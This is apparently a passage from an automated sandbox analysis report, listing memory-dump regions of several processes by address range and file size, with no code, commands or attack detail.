                                                                                                                                                                                                                                        • memory/3256-160-0x00007FFB48490000-0x00007FFB4849D000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          52KB

                                                                                                                                                                                                                                        • memory/3256-161-0x00007FFB3C440000-0x00007FFB3C558000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                        • memory/3256-143-0x00007FFB4B130000-0x00007FFB4B13D000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          52KB

                                                                                                                                                                                                                                        • memory/3256-144-0x00007FFB47500000-0x00007FFB4752E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          184KB

                                                                                                                                                                                                                                        • memory/3256-145-0x00007FFB35C20000-0x00007FFB35F99000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.5MB

                                                                                                                                                                                                                                        • memory/3256-2508-0x00007FFB35FA0000-0x00007FFB36406000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.4MB

                                                                                                                                                                                                                                        • memory/3256-2509-0x00007FFB4D500000-0x00007FFB4D518000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          96KB

                                                                                                                                                                                                                                        • memory/3256-2510-0x00007FFB4BF20000-0x00007FFB4BF2F000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          60KB

                                                                                                                                                                                                                                        • memory/3256-2511-0x00007FFB480A0000-0x00007FFB480CC000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          176KB

                                                                                                                                                                                                                                        • memory/3256-2512-0x00007FFB48520000-0x00007FFB48544000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          144KB

                                                                                                                                                                                                                                        • memory/3256-2513-0x00007FFB4BC20000-0x00007FFB4BC3F000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          124KB

                                                                                                                                                                                                                                        • memory/3256-2514-0x00007FFB36630000-0x00007FFB367AA000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                        • memory/3256-2515-0x00007FFB47530000-0x00007FFB47549000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                        • memory/3256-2516-0x00007FFB4B130000-0x00007FFB4B13D000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          52KB

                                                                                                                                                                                                                                        • memory/3256-2517-0x00007FFB47500000-0x00007FFB4752E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          184KB

                                                                                                                                                                                                                                        • memory/3256-2518-0x00007FFB35C20000-0x00007FFB35F99000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.5MB

                                                                                                                                                                                                                                        • memory/3256-2519-0x00007FFB40A20000-0x00007FFB40AD8000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          736KB

                                                                                                                                                                                                                                        • memory/3256-2520-0x00007FFB474E0000-0x00007FFB474F5000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          84KB

                                                                                                                                                                                                                                        • memory/3256-2521-0x00007FFB48490000-0x00007FFB4849D000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          52KB

                                                                                                                                                                                                                                        • memory/3256-2522-0x00007FFB3C440000-0x00007FFB3C558000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                        • memory/3256-2478-0x00007FFB36630000-0x00007FFB367AA000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                        • memory/3256-2477-0x00007FFB4BC20000-0x00007FFB4BC3F000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          124KB

                                                                                                                                                                                                                                        • memory/3256-142-0x00007FFB47530000-0x00007FFB47549000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                                        • memory/3256-135-0x00007FFB480A0000-0x00007FFB480CC000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          176KB

                                                                                                                                                                                                                                        • memory/3256-140-0x00007FFB4BC20000-0x00007FFB4BC3F000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          124KB

                                                                                                                                                                                                                                        • memory/3256-141-0x00007FFB36630000-0x00007FFB367AA000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                        • memory/3256-136-0x00007FFB4D500000-0x00007FFB4D518000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          96KB

                                                                                                                                                                                                                                        • memory/3256-125-0x00007FFB48520000-0x00007FFB48544000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          144KB

                                                                                                                                                                                                                                        • memory/3256-1929-0x00007FFB35FA0000-0x00007FFB36406000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.4MB

                                                                                                                                                                                                                                        • memory/3256-1930-0x00007FFB48520000-0x00007FFB48544000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          144KB

                                                                                                                                                                                                                                        • memory/3256-126-0x00007FFB4BF20000-0x00007FFB4BF2F000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          60KB

                                                                                                                                                                                                                                        • memory/3256-102-0x00007FFB35FA0000-0x00007FFB36406000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4.4MB

                                                                                                                                                                                                                                        • memory/3460-333-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-341-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-320-0x00000299289A0000-0x00000299289A1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-373-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-383-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-381-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-379-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-321-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-323-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-325-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-327-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-329-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-331-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-335-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-337-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-377-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-339-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-375-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-343-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-345-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-347-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-349-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-351-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-353-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-355-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-357-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-359-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-361-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-363-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-365-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-367-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-369-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/3460-371-0x00000299289B0000-0x00000299289B1000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/4924-260-0x00000265DCF90000-0x00000265DCFB2000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                        • memory/5244-1613-0x000001B970640000-0x000001B970648000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                        • memory/6260-4076-0x000000001B780000-0x000000001B790000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/6260-4070-0x000000001B770000-0x000000001B77E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                        • memory/6260-4107-0x000000001B9A0000-0x000000001B9EE000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          312KB

                                                                                                                                                                                                                                        • memory/6260-4105-0x000000001B930000-0x000000001B948000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          96KB

                                                                                                                                                                                                                                        • memory/6260-4103-0x000000001B890000-0x000000001B89E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                        • memory/6260-4101-0x000000001B880000-0x000000001B890000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/6260-4099-0x000000001B870000-0x000000001B87E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                        • memory/6260-4097-0x000000001B8D0000-0x000000001B92A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          360KB

                                                                                                                                                                                                                                        • memory/6260-4093-0x000000001B860000-0x000000001B870000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/6260-4091-0x000000001B7A0000-0x000000001B7B0000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/6260-4007-0x0000000000340000-0x00000000006D2000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.6MB

                                                                                                                                                                                                                                        • memory/6260-4010-0x0000000000340000-0x00000000006D2000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.6MB

                                                                                                                                                                                                                                        • memory/6260-4036-0x0000000002A00000-0x0000000002A26000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          152KB

                                                                                                                                                                                                                                        • memory/6260-4040-0x0000000002980000-0x000000000298E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                        • memory/6260-4042-0x0000000002A30000-0x0000000002A4C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          112KB

                                                                                                                                                                                                                                        • memory/6260-4043-0x000000001B7B0000-0x000000001B800000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          320KB

                                                                                                                                                                                                                                        • memory/6260-4045-0x00000000029D0000-0x00000000029E0000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/6260-4054-0x000000001B630000-0x000000001B648000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          96KB

                                                                                                                                                                                                                                        • memory/6260-4058-0x00000000029E0000-0x00000000029F0000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/6260-4060-0x00000000029F0000-0x0000000002A00000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                        • memory/6260-4064-0x000000001B760000-0x000000001B76E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                        • memory/6260-4083-0x000000001B790000-0x000000001B79E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                        • memory/6260-4072-0x000000001B800000-0x000000001B812000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                        • memory/6260-4081-0x000000001BD90000-0x000000001C2B8000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          5.2MB

                                                                                                                                                                                                                                        • memory/6260-4078-0x000000001B820000-0x000000001B836000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                                        • memory/6260-4080-0x000000001B840000-0x000000001B852000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                        • memory/7664-2733-0x0000022B6C840000-0x0000022B6C84A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                        • memory/7664-2739-0x0000022B6C850000-0x0000022B6C858000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                        • memory/7664-2724-0x0000022B6C530000-0x0000022B6C5E3000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          716KB

                                                                                                                                                                                                                                        • memory/7664-2728-0x0000022B6C860000-0x0000022B6C87C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          112KB

                                                                                                                                                                                                                                        • memory/7664-2723-0x0000022B6C510000-0x0000022B6C52C000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          112KB

                                                                                                                                                                                                                                        • memory/7664-2742-0x0000022B6C880000-0x0000022B6C886000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          24KB

                                                                                                                                                                                                                                        • memory/7664-2725-0x0000022B6C500000-0x0000022B6C50A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                        • memory/7664-2734-0x0000022B6C8A0000-0x0000022B6C8BA000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                        • memory/7664-2747-0x0000022B6C890000-0x0000022B6C89A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                        • memory/8704-3965-0x0000015CCBF70000-0x0000015CCC01A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          680KB

                                                                                                                                                                                                                                        • memory/8704-1937-0x0000015CCBB20000-0x0000015CCBB32000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                        • memory/8704-1917-0x0000015CB2180000-0x0000015CB21A6000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          152KB

                                                                                                                                                                                                                                        • memory/8704-1916-0x0000015CCAD00000-0x0000015CCAD3A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          232KB

                                                                                                                                                                                                                                        • memory/8704-1913-0x0000015CCAC50000-0x0000015CCACBA000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          424KB

                                                                                                                                                                                                                                        • memory/8704-1912-0x0000015CB21C0000-0x0000015CB21CA000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                        • memory/8728-4623-0x0000000000CF0000-0x0000000001082000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.6MB